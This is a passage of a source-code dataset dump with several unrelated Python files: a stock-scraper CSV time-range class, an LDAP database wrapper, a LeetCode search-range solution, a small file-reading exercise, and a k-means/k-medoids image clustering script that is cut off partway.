web2csv_time_duration_update_before.AppendDirection = cls.CSV_APPEND_BEFORE\n # g_logger.debug(\"Extend the time duration before the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_before.OldCSVStart, web2csv_time_duration_update_before.OldCSVEnd, web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.OldCSVEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_before,),)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_AFTER:\n# The new time range is extended after the end side of the original time range\n web2csv_time_duration_update_after = cls()\n web2csv_time_duration_update_after.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_after.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_after.NewWebStart = web2csv_time_duration_update_after.OldCSVEnd + 1\n web2csv_time_duration_update_after.NewWebEnd = time_duration_end\n web2csv_time_duration_update_after.AppendDirection = cls.CSV_APPEND_AFTER\n # g_logger.debug(\"Extend the time duration after the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.OldCSVEnd, web2csv_time_duration_update_after.NewWebStart, web2csv_time_duration_update_after.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_after,),)\n elif overlap_case == CMN_DEF.TIME_OVERLAP_COVER:\n# The new time range covers the original time range and extended before/after the start/end side of the original time range\n web2csv_time_duration_update_before = cls()\n web2csv_time_duration_update_before.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_before.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_before.NewWebStart = time_duration_start\n web2csv_time_duration_update_before.NewWebEnd = web2csv_time_duration_update_before.OldCSVStart - 1\n web2csv_time_duration_update_before.AppendDirection = cls.CSV_APPEND_BEFORE\n # g_logger.debug(\"Extend the time duration before the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_before.OldCSVStart, web2csv_time_duration_update_before.OldCSVEnd, web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_before.NewWebEnd))\n web2csv_time_duration_update_after = cls()\n web2csv_time_duration_update_after.OldCSVStart = csv_old_time_duration_tuple.time_duration_start\n web2csv_time_duration_update_after.OldCSVEnd = csv_old_time_duration_tuple.time_duration_end\n web2csv_time_duration_update_after.NewWebStart = web2csv_time_duration_update_after.OldCSVEnd + 1\n web2csv_time_duration_update_after.NewWebEnd = time_duration_end\n web2csv_time_duration_update_after.AppendDirection = cls.CSV_APPEND_AFTER\n # g_logger.debug(\"Extend the time duration after the original CSV data[%s %s:%s]: %s:%s\" % (CMN_DEF.SCRAPY_METHOD_DESCRIPTION[self.SCRAPY_CLASS_INDEX], web2csv_time_duration_update_after.OldCSVStart, web2csv_time_duration_update_after.OldCSVEnd, web2csv_time_duration_update_after.NewWebStart, web2csv_time_duration_update_after.NewWebEnd))\n new_csv_extension_time_duration = TimeDurationTuple(web2csv_time_duration_update_before.NewWebStart, web2csv_time_duration_update_after.NewWebEnd)\n return (new_csv_extension_time_duration, (web2csv_time_duration_update_before, web2csv_time_duration_update_after,),)\n# If the time range of new data contain all the time range of csv data, the system is not desiged to update two time range interval\n else:\n raise CMN.EXCEPTION.WebScrapyUnDefiedCaseException(\"The system does NOT support this type[2] of the range update; CSV data[%s:%s], new data[%s:%s]\" % (csv_old_time_duration_tuple.time_duration_start, csv_old_time_duration_tuple.time_duration_end, time_duration_start, time_duration_end))\n\n\n @classmethod\n def get_csv_time_duration_update(cls, time_duration_start, time_duration_end, csv_old_time_duration_tuple=None):\n if csv_old_time_duration_tuple is None:\n return cls.get_init_csv_time_duration_update(time_duration_start, time_duration_end)\n else:\n return cls.get_extended_csv_time_duration_update(time_duration_start, time_duration_end, csv_old_time_duration_tuple)\n\n\n def __init__(self):\n self.append_direction = self.CSV_APPEND_NONE\n self.old_csv_start = None\n self.old_csv_end = None\n self.new_web_start = None\n self.new_web_end = None\n # self.new_csv_start = None\n # self.new_csv_end = None\n self.description = None\n\n\n def __str__(self):\n if self.description is None:\n self.description = \"\"\n if self.old_csv_start is not None:\n self.description += \"OCS: %s; \" % self.old_csv_start\n if self.old_csv_end is not None:\n self.description += \"OCE: %s; \" % self.old_csv_end\n if self.new_web_start is not None:\n self.description += \"NWS: %s; \" % self.new_web_start\n if self.new_web_end is not None:\n self.description += \"NWE: %s; \" % self.new_web_end\n # if self.new_csv_start is not None:\n # self.description += \"NCS: %s; \" % self.new_csv_start\n # if self.new_csv_end is not None:\n # self.description += \"NCE: %s; \" % self.new_csv_end\n return self.description\n\n\n def __repr__(self):\n return self.__str__()\n\n @property\n def NeedUpdate(self):\n return (True if (self.append_direction != self.CSV_APPEND_NONE) else False)\n\n @property\n def AppendDirection(self):\n return self.append_direction\n @AppendDirection.setter\n def AppendDirection(self, append_direction):\n self.append_direction = append_direction\n\n @property\n def OldCSVStart(self):\n return self.old_csv_start\n @OldCSVStart.setter\n def OldCSVStart(self, old_csv_start):\n self.old_csv_start = old_csv_start\n\n @property\n def OldCSVEnd(self):\n return self.old_csv_end\n @OldCSVEnd.setter\n def OldCSVEnd(self, old_csv_end):\n self.old_csv_end = old_csv_end\n\n @property\n def NewWebStart(self):\n return self.new_web_start\n @NewWebStart.setter\n def NewWebStart(self, new_web_start):\n self.new_web_start = new_web_start\n\n @property\n def NewWebEnd(self):\n return self.new_web_end\n @NewWebEnd.setter\n def NewWebEnd(self, new_web_end):\n self.new_web_end = new_web_end\n\n # @property\n # def NewCSVStart(self):\n # return self.new_csv_start\n # @NewCSVStart.setter\n # def NewCSVStart(self, new_csv_start):\n # self.new_csv_start = new_csv_start\n\n # @property\n # def NewCSVEnd(self):\n # return self.new_csv_end\n # @NewCSVEnd.setter\n # def NewCSVEnd(self, new_csv_end):\n # self.new_csv_end = new_csv_end\n\n\n def backup_old_csv_if_necessary(self, csv_filepath, ignore_old_csv_exist=False):\n backup_old_csv = False\n if self.append_direction == self.CSV_APPEND_BEFORE: #BASE.BASE.ScrapyBase.CSVTimeRangeUpdate.CSV_APPEND_BEFORE:\n old_csv_filepath = csv_filepath + \".old\"\n if CMN_FUNC.check_file_exist(old_csv_filepath):\n if not ignore_old_csv_exist:\n raise ValueError(\"The CSV file[%s] already exists !!!\" % old_csv_filepath)\n else:\n # g_logger.debug(\"Need add the new data in front of the old CSV data, rename the file: %s\" % (csv_filepath + \".old\"))\n CMN_FUNC.rename_file_if_exist(csv_filepath, csv_filepath + \".old\") \n backup_old_csv = True\n return backup_old_csv\n\n\n def append_old_csv_if_necessary(self, csv_filepath):\n if self.append_direction == self.CSV_APPEND_BEFORE: #BASE.BASE.ScrapyBase.CSVTimeRangeUpdate.CSV_APPEND_BEFORE:\n # g_logger.debug(\"Append the old CSV data to the file: %s\" % csv_filepath)\n CMN_FUNC.append_data_into_file(csv_filepath + \".old\", csv_filepath)\n CMN_FUNC.remove_file_if_exist(csv_filepath + \".old\") \n\n\nclass CSVFileNoScrapyRecord(object):\n\n # STATUS_RECORD_TIME_RANGE_NOT_OVERLAP = 0\n # STATUS_RECORD_CSV_FILE_ALREADY_EXIST = 1\n # STATUS_RECORD_WEB_DATA_NOT_FOUND = 2\n # RECORD_TYPE_INDEX_LIST = [\n # STATUS_RECORD_TIME_RANGE_NOT_OVERLAP,\n # STATUS_RECORD_CSV_FILE_ALREADY_EXIST,\n # STATUS_RECORD_WEB_DATA_NOT_FOUND\n # ]\n RECORD_TYPE_INDEX = 0\n RECORD_TYPE_DESCRIPTION_INDEX = 1\n RECORD_TYPE_ENTRY_LIST = [\n [\"TimeRangeNotOverlap\", \"The search time range does NOT overlap the one in the URL time range lookup table\",],\n [\"CSVFileAlreadyExist\", \"The CSV files of the time range has already existed in the local folder\",],\n [\"WebDataNotFound\", \"The web data of the URL is NOT found\",],\n ]\n RECORD_TYPE_SIZE = len(RECORD_TYPE_ENTRY_LIST)\n TIME_RANGE_NOT_OVERLAP_RECORD_INDEX = 0\n CSV_FILE_ALREADY_EXIST_RECORD_INDEX = 1\n WEB_DATA_NOT_FOUND_RECORD_INDEX = 2\n\n RECORD_TYPE_LIST = [entry[RECORD_TYPE_INDEX] for entry in RECORD_TYPE_ENTRY_LIST]\n RECORD_TYPE_DESCRIPTION_LIST = [entry[RECORD_TYPE_DESCRIPTION_INDEX] for entry in RECORD_TYPE_ENTRY_LIST]\n\n @classmethod\n def create_register_status_instance(cls):\n # import pdb; pdb.set_trace()\n csv_file_no_scrapy_record = cls()\n for index in range(cls.RECORD_TYPE_SIZE):\n csv_file_no_scrapy_record.__register_record_type(\n cls.RECORD_TYPE_LIST[index], \n cls.RECORD_TYPE_DESCRIPTION_LIST[index]\n )\n return csv_file_no_scrapy_record\n\n\n def __init__(self):\n self.record_type_dict = {}\n self.record_type_description_dict = {}\n self.web_data_not_found_time_start = None\n self.web_data_not_found_time_end = None\n\n\n def __register_record_type(self, record_type_name, record_type_description):\n # import pdb; pdb.set_trace()\n if self.record_type_dict.has_key(record_type_name):\n g_logger.debug(\"The type[%s] has already exist\" % record_type_name)\n return\n self.record_type_dict[record_type_name] = []\n self.record_type_description_dict[record_type_name] = record_type_description\n\n\n def __add_record(self, record_type_name, *args):\n if not self.record_type_dict.has_key(record_type_name):\n raise ValueError(\"Unknown Check Status Type: %s\" % record_type_name)\n self.record_type_dict[record_type_name].append(args)\n\n\n def add_time_range_not_overlap_record(self, *args):\n# Market\n# args[0]: source type index\n# Stock\n# args[0]: source type index\n# args[1]: company code number\n self.__add_record(\"TimeRangeNotOverlap\", *args)\n\n\n def add_csv_file_already_exist_record(self, *args):\n# Market\n# args[0]: source type index\n# Stock\n# args[0]: source type index\n# args[1]: company code number\n self.__add_record(\"CSVFileAlreadyExist\", *args)\n\n\n def add_web_data_not_found_record(self, *args):\n# Market\n# args[0]: time slice. None for a must to flush data into list\n# args[1]: source type index\n# Stock\n# args[0]: time slice. None for a must to flush data into list\n# args[1]: source type index\n# args[2]: company code number\n need_flush = False\n if args[0] is None:\n if self.web_data_not_found_time_start is not None:\n need_flush = True\n else:\n if self.web_data_not_found_time_start is None:\n self.web_data_not_found_time_start = self.web_data_not_found_time_end = args[0]\n else:\n if self.web_data_not_found_time_end.check_continous_time_duration(args[0]):\n self.web_data_not_found_time_end = args[0]\n else:\n need_flush = True\n# Keep track of the time range in which the web data is empty\n if need_flush:\n# Market\n# args_new[0]: time slice. None for a must to flush data into list\n# args_new[1]: source type index\n# args_new[2]: empty time start\n# args_new[3]: empty time end\n# Stock\n# args_new[0]: time slice. None for a must to flush data into list\n# args_new[1]: source type index\n# args_new[2]: company code number\n# args_new[2]: empty time start\n# args_new[3]: empty time end\n # import pdb; pdb.set_trace()\n # args_new = copy.deepcopy(args)\n args_new = [arg for arg in args]\n args_new.append(self.web_data_not_found_time_start)\n args_new.append(self.web_data_not_found_time_end)\n self.web_data_not_found_time_start = self.web_data_not_found_time_end = None\n self.__add_record(\"WebDataNotFound\", *args_new)\n","sub_path":"depreated_libs/common/common_class.py","file_name":"common_class.py","file_ext":"py","file_size_in_byte":50388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"563097407","text":"# encoding = utf-8\n\nimport ldap\nimport logging\n\n# Get an instance of a logger\nlogger = logging.getLogger('ldap_server.backend.base')\nlogger.setLevel(logging.INFO)\n\nclass InvalidCredentials(Exception):\n pass\n\nclass ServerDown(Exception):\n pass\n\nclass DatabaseCursor(object):\n def __init__(self, ldap_connection):\n self.connection = ldap_connection\n\nclass LdapDatabase(object):\n def __init__(self, settings_dict):\n self.settings_dict = settings_dict\n self.charset = \"utf-8\"\n self.connection = None\n self._cursor()\n\n def _cursor(self):\n if self.connection is None:\n try:\n logger.debug('Connecting to LDAP at %s with account %s' %(self.settings_dict['NAME'], self.settings_dict['USER']))\n \n if self.settings_dict['CACERT']:\n logger.debug('Using CACERT: %s' % self.settings_dict['CACERT'])\n ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, self.settings_dict['CACERT'])\n\n self.connection = ldap.initialize(self.settings_dict['NAME'])\n\n if self.settings_dict['STARTTLS']:\n logger.debug('Using STARTTLS')\n self.connection.start_tls_s()\n\n self.connection.simple_bind_s(\n self.settings_dict['USER'],\n self.settings_dict['PASSWORD'])\n\n except ldap.SERVER_DOWN:\n logger.error('LDAP server is down')\n raise ServerDown\n\n except ldap.INVALID_CREDENTIALS:\n logger.error('Invalid credentials')\n raise InvalidCredentials\n \n return DatabaseCursor(self.connection)\n\n def add_s(self, dn, modlist):\n logger.info('Adding entry \\'%s\\'' % dn)\n cursor = self._cursor()\n return cursor.connection.add_s(dn.encode(self.charset), modlist)\n\n def delete_s(self, dn):\n logger.info('Deleting entry \\'%s\\'' % dn)\n cursor = self._cursor()\n return cursor.connection.delete_s(dn.encode(self.charset))\n\n def modify_s(self, dn, modlist):\n logger.info('Modifying entry \\'%s\\'' % dn)\n if modlist:\n logger.debug('Modifying attributes: %s' % ', '.join([mod[1] for mod in modlist]))\n\n cursor = self._cursor()\n return cursor.connection.modify_s(dn.encode(self.charset), modlist)\n\n def rename_s(self, dn, newrdn):\n logger.info('Renaming entry \\'%s\\' to \\'%s\\'' % (dn, newrdn))\n cursor = self._cursor()\n return cursor.connection.rename_s(dn.encode(self.charset), newrdn.encode(self.charset))\n\n def search_s(self, base, scope, filterstr='(objectClass=*)', attrlist=None):\n logger.debug('Searching entries...')\n logger.debug('Base: %s' % base)\n logger.debug('Filter: %s' % filterstr)\n \n if attrlist:\n logger.debug('Attributes: %s' % ', '.join(attrlist))\n\n cursor = self._cursor()\n results = cursor.connection.search_s(base, scope, filterstr.encode(self.charset), attrlist)\n output = []\n for dn, attrs in results:\n output.append((dn.decode(self.charset), attrs))\n return output\n\n def whoami(self):\n return self.settings_dict['USER']\n","sub_path":"ldap_server/backend/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641607624","text":"class Solution(object):\n def searchRange(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n\n def search(left, right, target, range):\n if left > right:\n return -1\n\n mid = left + (right - left) // 2\n\n if nums[mid] > target:\n search(left, mid - 1, target, range)\n elif nums[mid] < target:\n search(mid + 1, right, target, range)\n else:\n # equal\n if mid < range[0]:\n range[0] = mid\n search(left, mid - 1, target, range)\n if mid > range[1]:\n range[1] = mid\n search(mid + 1, right, target, range)\n\n range = [len(nums), -1]\n search(0, len(nums) - 1, target, range)\n\n if range[0] == len(nums):\n return [-1, -1]\n\n return range\n\n\n","sub_path":"34 Search For a Range.py","file_name":"34 Search For a Range.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"482624831","text":"#Name : problemthree.py\r\n#Author : Min Khant Htoo(17S23) of Pioneer JC\r\n#DOC : 9/05/2017\r\n#Last updated : \r\n#Description :\r\n\r\ndef main():\r\n print(\"### ###\")\r\n infile = open(\"records.txt\",\"r\")\r\n xlist = []\r\n ylist = []\r\n print(\"X\")\r\n for line in infile:\r\n x,y = line[:-1].split(\",\")\r\n xlist.append(x)\r\n ylist.append(y)\r\n print(\"X\")\r\n input()\r\n infile.close()\r\n z = int(0)\r\n for i in range(len(xlist)):\r\n z = z + ((int(xlist[i])**2) - (int(ylist[i])**2))\r\n print(\"X\")\r\n print(\"|{0:^7}|{1:^7}|\".format(\"x\",\"y\"))\r\n for i in range(len(xlist)):\r\n print(\"|{0:^7}|{1:^7}|\".format(xlist[i],ylist[i]))\r\n print(\"z = {0}\".format(z))\r\n print(\"X\")\r\n \r\n input(\"Press Any Key to continue ...\")\r\n print(\"### Program Ending ... ###\")\r\n\r\nmain()\r\n\r\n","sub_path":"Computing J1/Programming Exercise 3/problemthree.py","file_name":"problemthree.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"175423194","text":"import numpy as np\nimport imageio\nfrom matplotlib import pyplot as plt\nimport sys\nimport os\nimport time\n\n\n'''\nK-Means Implementation and Functions\n---------------------------------------\n'''\ndef distance3d(pixel, cluster):\n\tpixel = pixel.astype(float)\n\tcluster = cluster.astype(float)\n\treturn (pixel[0] - cluster[0])**2 + (pixel[1] - cluster[1])**2 + (pixel[2] - cluster[2])**2\n\n\ndef assignclusters(pixels, clusters):\n\tassignments = np.zeros((pixels.shape[0], 1), np.int)\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, clusters.shape[0]):\n\t\t\tcluster = clusters[j][:]\n\t\t\tdistance = distance3d(pixel, cluster)\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments[i] = assign\n\tgroups = np.linspace(0, clusters.shape[0] - 1, num=clusters.shape[0], dtype=np.int)\n\tmask = np.isin(groups, np.unique(assignments))\n\t# Check for empty clusters and randomly assign to keep algorithm running (for large # of clusters)\n\tif np.isin(False,mask):\n\t\tprint(\"Some empty clusters found, random sampling new points for cluster\")\n\t\tfor i in range(0, mask.shape[0]):\n\t\t\tif mask[i] == False:\n\t\t\t\tselections = np.random.randint(0, assignments.shape[0], 1)\n\t\t\t\tassignments[selections] = i\n\treturn assignments\n\n\ndef centeradjustment(assignments, pixels, K):\n\tpixel_locations = np.concatenate((assignments, pixels), axis=1)\n\tpixel_locations.sort(axis=0)\n\tcluster_sum = np.zeros((K,3), np.int)\n\tcluster_num = 0\n\tcluster_count = 0\n\tfor i in range(0, pixel_locations.shape[0]):\n\t\tif pixel_locations[i][0] > cluster_count:\n\t\t\tcluster_sum[cluster_count] = cluster_sum[cluster_count] / cluster_num\n\t\t\tcluster_count = cluster_count + 1\n\t\t\tcluster_num = 0\n\t\tcluster_num = cluster_num + 1\n\t\tcluster_sum[cluster_count] = cluster_sum[cluster_count] + pixel_locations[i][1:4]\n\tcluster_sum[-1] = cluster_sum[-1] / cluster_num # last group\n\tclusters = cluster_sum\n\treturn clusters\n\n\ndef mykmeans(pixels, K):\n\tcentroids_ind = np.random.randint(0, pixels.shape[0], (K, 1)) # initialize as random index location\n\tcentroids = pixels[centroids_ind.squeeze()]\n\tsteps = 100\n\tcnt = 1\n\tepsilon = 1e-1\n\tconverged = False\n\tprint(\"Clustering iterations for K-Means are beginning...\")\n\twhile not converged:\n\t\t# CLUSTER ASSIGNMENT\n\t\tclasses = assignclusters(pixels, centroids)\n\t\tcentroids_last = centroids\n\t\t# CLUSTER ADJUSTMENT\n\t\tcentroids = centeradjustment(classes, pixels, K)\n\t\tif (cnt % 10 == 0 or cnt == 1):\n\t\t\tprint(\"K-means Iteration #{}\".format(cnt))\n\t\t\tprint(\"Centroid clusters: \\n {}\".format(centroids))\n\t\tcnt = cnt + 1\n\t\tif np.linalg.norm(centroids-centroids_last, axis=0).sum() < epsilon:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Means Converged after {} iterations\".format(cnt))\n\t\telif cnt >= steps:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Means Stopped after reaching max {} iterations\".format(cnt))\n\t\telse:\n\t\t\tpass\n\treturn classes, centroids\n\n\n'''\nK-Mediod Implementation and Functions\n---------------------------------------\n'''\ndef distance_function(pixel, cluster, option):\n\tpixel = pixel.astype(float)\n\tcluster = cluster.astype(float)\n\tif option == 0: # euclidean\n\t\tdistance = (pixel[0] - cluster[0]) ** 2 + (pixel[1] - cluster[1]) ** 2 + (pixel[2] - cluster[2]) ** 2\n\telif option == 1: # L1\n\t\tdistance = abs(pixel[0] - cluster[0]) + abs(pixel[1] - cluster[1]) + abs(pixel[2] - cluster[2])\n\telse:\n\t\tdistance = 0\n\treturn distance\n\n\ndef kmed_assignclusters(pixels, clusters, K, option):\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\t# option = 0\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, K):\n\t\t\tcluster = clusters[j][:]\n\t\t\t# distance = distance3d(pixel, cluster) #TODO: change distance function\n\t\t\tdistance = distance_function(pixel, cluster, option)\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments_r[i][assign] = 1\n\n\treturn assignments_r\n\n\ndef distance_matrix(pixels):\n\tprint(\"Calculating Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tPt = np.transpose(P)\n\tq=np.linalg.norm(P, axis=1)\n\tD = q + np.transpose(q) - 2*np.matmul(P,Pt)\n\tprint(\"Distance matrix calculated!\")\n\treturn D\n\n\ndef distance_matrix_manhattan(pixels):\n\tprint(\"Calculating Manhattan Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tDj = np.zeros((P.shape[0], P.shape[0], 3))\n\tq = np.linalg.norm(P,axis=1)\n\tfor j in range(0,3):\n\t\tPj = P[:, j]\n\t\tPjt = np.transpose(Pj)\n\t\tq = np.square(Pj)\n\t\tqt = np.transpose(q)\n\t\tDj[:,:,j] = q + qt - 2*np.matmul(Pj, Pjt)\n\n\tD = np.sum(Dj, axis=2)\n\tprint(\"Distance Manhattan matrix calculated!\")\n\n\treturn D\n\n\ndef distance_matrix_chebychev(pixels):\n\tprint(\"Calculating Chebychev Distance Matrix...\")\n\tP = pixels-np.mean(pixels, axis=0)\n\tDj = np.zeros((P.shape[0], P.shape[0], 3))\n\tq = np.linalg.norm(P,axis=1)\n\tfor j in range(0,3):\n\t\tPj = P[:, j]\n\t\tPjt = np.transpose(Pj)\n\t\tq = np.square(Pj)\n\t\tqt = np.transpose(q)\n\t\tDj[:,:,j] = q + qt - 2*np.matmul(Pj, Pjt)\n\n\tD = np.max(Dj, axis=2)\n\tprint(\"Distance Chebychev matrix calculated!\")\n\treturn D\n\n\ndef kmed_assignclusters_matrix(pixels, centroids_ind, K, D):\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\tfor i in range(0, pixels.shape[0]):\n\t\t# assign pixel to cluster\n\t\tpixel = pixels[i][:]\n\t\tassign = 0\n\t\tmin_dis = float(\"inf\")\n\t\tfor j in range(0, K):\n\t\t\tind = centroids_ind[j][:]\n\t\t\tdistance = D[i, j]\n\t\t\t# distance = # find in distance matrix\n\t\t\tif distance < min_dis:\n\t\t\t\tmin_dis = distance\n\t\t\t\tassign = j\n\t\tassignments_r[i][assign] = 1\n\n\t# groups = np.linspace(0, K - 1, num=K, dtype=np.int)\n\t# mask = np.isin(groups, np.unique(assignments_r))\n\t# # Check for empty clusters and randomly assign to keep algorithm running (for large # of clusters)\n\t# if np.isin(False, mask):\n\t# \tprint(\"Some empty clusters found, random sampling new points for cluster\")\n\t# \tfor i in range(0, mask.shape[0]):\n\t# \t\tif mask[i] == False:\n\t# \t\t\tselections = np.random.randint(0, assignments_r.shape[0], 1)\n\t# \t\t\tassignments_r[selections] = i\n\n\treturn assignments_r\n\n\ndef kmed_findcentroid_matrix(cluster_pixels, pixels, D):\n\tbest_centroid = 0\n\tbest_distancesum = float(\"inf\")\n\tdistancesum = 0.0\n\tfor i in range(0,cluster_pixels.shape[0]):\n\t\t# print(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistancesum = 0.0\n\t\tfor j in range(0, cluster_pixels.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = D[i,j]\n\t\t\t\tdistancesum = distancesum + distance\n\t\tif distancesum < best_distancesum:\n\t\t\tbest_distancesum = distancesum\n\t\t\tbest_centroid = i\n\n\treturn best_centroid\n\n\ndef kmed_findcentroid(cluster_pixels, pixels):\n\tbest_centroid = 0\n\tbest_distancesum = float(\"inf\")\n\tdistancesum = 0.0\n\tfor i in range(0,cluster_pixels.shape[0]):\n\t\tprint(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistancesum = 0.0\n\t\tfor j in range(0, cluster_pixels.shape[0]):\n\t\t\tif i==j:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance = distance_function(pixel_sel.squeeze(), pixels[cluster_pixels[j]].squeeze(), option=1)\n\t\t\t\tdistancesum = distancesum + distance\n\t\tif distancesum < best_distancesum:\n\t\t\tbest_distancesum = distancesum\n\t\t\tbest_centroid = i\n\n\treturn best_centroid\n\n\ndef kmed_L2centroid(cluster_pixels, pixels):\n\tbest_centroid = 0\n\tbest_distance = float(\"inf\")\n\tmean = pixels[cluster_pixels].mean(axis=0)\n\tfor i in range(0, cluster_pixels.shape[0]):\n\t\t# print(\"{} of {} data points checked for dissimilarity in this cluster\".format(i, cluster_pixels.shape[0]))\n\t\tpixel_sel = pixels[cluster_pixels[i]]\n\t\tdistance = distance_function(pixel_sel.squeeze(), mean.squeeze(), option=0)\n\t\tif distance < best_distance:\n\t\t\tbest_distance = distance\n\t\t\tbest_centroid = cluster_pixels[i].squeeze()\n\treturn best_centroid\n\n\ndef kmed_updateclusters(assign_r, pixels, K):\n\tcluster_inds = np.zeros((K,1), np.int)\n\tclusters = pixels[cluster_inds.squeeze()]\n\tfor i in range(0,K):\n\t\tpixel_ind = np.transpose(np.nonzero(assign_r[:, i]))\n\t\tquick = True\n\t\tif quick: # using knowledge of L2 norm for faster solution\n\t\t\tcluster_ind = kmed_L2centroid(pixel_ind, pixels)\n\t\telse:\n\t\t\tcluster_ind = kmed_findcentroid(pixel_ind, pixels)\n\t\tcluster_inds[i] = cluster_ind\n\n\tclusters = pixels[cluster_inds.squeeze()]\n\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\twhile ind.shape[0] < clusters.shape[0]:\n\t\tfor i in range(0, clusters.shape[0]):\n\t\t\tif i not in ind:\n\t\t\t\tclusters[i] = pixels[np.random.randint(0, pixels.shape[0])]\n\t\t\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\treturn clusters\n\n\ndef kmed_updateclusters_matrix(assign_r, pixels, K, D):\n\tcluster_inds = np.zeros((K,1), np.int)\n\tclusters = pixels[cluster_inds.squeeze()]\n\tfor i in range(0,K):\n\t\tpixel_ind = np.transpose(np.nonzero(assign_r[:, i]))\n\t\tcluster_ind = kmed_findcentroid_matrix(pixel_ind, pixels, D)\n\t\tcluster_inds[i] = cluster_ind\n\n\tclusters = pixels[cluster_inds.squeeze()]\n\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\twhile ind.shape[0] < clusters.shape[0]:\n\t\tfor i in range(0, clusters.shape[0]):\n\t\t\tif i not in ind:\n\t\t\t\tclusters[i] = pixels[np.random.randint(0, pixels.shape[0])]\n\t\tuniq, ind = np.unique(clusters, axis=0, return_index=True)\n\treturn clusters\n\n\ndef mykmedoids(pixels, K, option=0):\n\t'''\n\tK-Mediod Options:\n\t0: Quick L2 norm implementation\n\t1: Slow L2 (TODO)\n\t2: Matrix Math L2 (TODO)\n\t'''\n\tcentroids_ind = np.random.randint(0, pixels.shape[0], (K, 1)) # initialize as random index location\n\n\tcentroids = pixels[centroids_ind.squeeze()]\n\tassignments_r = np.zeros((pixels.shape[0], K))\n\n\t# if matrix option, calculate D matrix\n\tif option == 2:\n\t\tD = distance_matrix(pixels)\n\telif option == 3:\n\t\tD = distance_matrix_manhattan(pixels)\n\telif option == 4:\n\t\tD = distance_matrix_chebychev(pixels)\n\tsteps = 100\n\tcnt = 1\n\tepsilon = 1e-1\n\tconverged = False\n\tprint(\"Clustering iterations for K-Medoids are beginning...\")\n\twhile not converged:\n\t\t# CLUSTER ASSIGNMENT\n\t\tif option==2 or option == 3 or option == 4:\n\t\t\tassignments_r = kmed_assignclusters_matrix(pixels, centroids_ind, K, D)\n\t\telse:\n\t\t\tassignments_r = kmed_assignclusters(pixels, centroids, K, option)\n\t\tcentroids_last = centroids\n\t\t# CLUSTER ADJUSTMENT\n\t\tif option==2 or option == 3 or option == 4:\n\t\t\tcentroids = kmed_updateclusters_matrix(assignments_r, pixels, K, D)\n\t\telse:\n\t\t\tcentroids = kmed_updateclusters(assignments_r, pixels, K)\n\n\t\tif (cnt % 10 == 0 or cnt == 1):\n\t\t\tprint(\"K-Mediods Iteration #{}\".format(cnt))\n\t\t\tprint(\"Centroid clusters: \\n {}\".format(centroids))\n\t\tcnt = cnt + 1\n\t\tarray, locations = np.where(assignments_r == 1)\n\t\tclasses = locations.reshape((locations.shape[0], 1))\n\t\tif np.linalg.norm(centroids-centroids_last, axis=0).sum() < epsilon:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Mediods Converged after {} iterations\".format(cnt))\n\t\telif cnt >= steps:\n\t\t\tconverged = True\n\t\t\tprint(\"K-Mediods Stopped after 